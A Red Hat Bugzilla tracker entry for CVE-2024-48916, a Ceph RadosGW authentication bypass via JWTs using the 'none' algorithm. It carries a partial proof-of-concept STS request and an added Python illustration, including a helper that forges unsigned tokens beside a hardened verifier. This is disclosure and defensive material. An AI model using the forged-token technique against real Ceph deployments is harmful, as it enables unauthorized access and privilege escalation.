Bug 2329846 (CVE-2024-48916) - CVE-2024-48916 ceph: rhceph-container: Authentication bypass in CEPH RadosGW
Summary: CVE-2024-48916 ceph: rhceph-container: Authentication bypass in CEPH RadosGW
Keywords:
Status: NEW
Alias: CVE-2024-48916
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: high
Severity: high
Target Milestone: ---
Assignee: Product Security DevOps Team
QA Contact:
URL:
Whiteboard:
Depends On: 2329860 2329862 2323274 2329850 2329851 2329878 2329879 2329885 2329886 2335038 2335039
Blocks:
Reported: 2024-12-02 10:23 UTC by OSIDB Bzimport
Modified: 2025-03-03 05:46 UTC (History)

Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:




Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2024:10956 0 None None None 2024-12-11 14:14:23 UTC
Red Hat Product Errata RHSA-2024:10957 0 None None None 2024-12-11 14:25:55 UTC

Description OSIDB Bzimport 2024-12-02 10:23:18 UTC
This vulnerability affects the RadosGW OIDC provider by allowing attackers to bypass authentication using JWTs with "none" as the algorithm (alg). The lack of signature enforcement creates a serious risk of unauthorized access and privilege escalation.

The vulnerability is probably in the RadosGW OIDC provider.

PoC

The HTTP request can be found below, but without the JWT:

POST / HTTP/2
Host: storage.xxx.se
User-Agent: aws-sdk-go-v2/1.18.0 os/macos lang/go/1.21.1
X:nocoverageredesign md/GOOS/darwin md/GOARCH/arm64 api/sts/1.19.0
Content-Type: application/x-www-form-urlencoded
Amz-Sdk-Invocation-Id: 30a74697-7d7e-4c02-b041-97d68156ee78
Amz-Sdk-Request: attempt=1; max=3
Content-Length: 1508
Accept-Encoding: gzip, deflate, br

Action=AssumeRoleWithWebIdentity&DurationSeconds=3600&RoleArn=arn%3Aaws%3Aiam%3A%3Aorg_pentest002%3Arole%2Fu-pentest002STS&RoleSessionName=test&Version=2011-06-15&WebIdentityToken=ey..
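The failure mode the description names, a verifier that honours an "alg": "none" token header, shown beside a verifier that pins the algorithm and refuses unsigned tokens. This is an added illustration in Python, not RadosGW or Ceph code; the HS256 secret, the token builder and the two verifier functions are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo secret; a real deployment would use the provider's key material.
DEMO_SECRET = b"constructed-demo-secret"


def _b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_token(payload: dict, alg: str, secret: bytes = DEMO_SECRET) -> str:
    """Build a compact JWT for the demo; alg='none' yields an unsigned token (empty signature)."""
    header = _b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    body = _b64url_encode(json.dumps(payload).encode())
    if alg == "none":
        return f"{header}.{body}."
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"


def verify_lenient(token: str, secret: bytes = DEMO_SECRET) -> Optional[dict]:
    """Weak verifier: trusts the alg claimed inside the token, so alg=none skips the signature check."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(_b64url_decode(body_b64))  # no signature enforced at all
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return json.loads(_b64url_decode(body_b64))
    return None


def verify_strict(token: str, secret: bytes = DEMO_SECRET, expected_alg: str = "HS256") -> Optional[dict]:
    """Hardened verifier: the algorithm is pinned by the verifier, never taken from the token header."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != expected_alg or not sig_b64:
        return None  # 'none', any unexpected alg, and a missing signature are all rejected
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    return json.loads(_b64url_decode(body_b64))
```

The same pinning applies to asymmetric algorithms: the verifier decides which algorithm and key a given issuer is allowed to use, and anything else is a rejected token, not a fallback.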

Comment 3 errata-xmlrpc 2024-12-11 14:14:22 UTC
This issue has been addressed in the following products:

  Red Hat Ceph Storage 8.0

Via RHSA-2024:10956 https://access.redhat.com/errata/RHSA-2024:10956

Comment 4 errata-xmlrpc 2024-12-11 14:25:54 UTC
This issue has been addressed in the following products:

  Red Hat Ceph Storage 8.0

Via RHSA-2024:10957 https://access.redhat.com/errata/RHSA-2024:10957

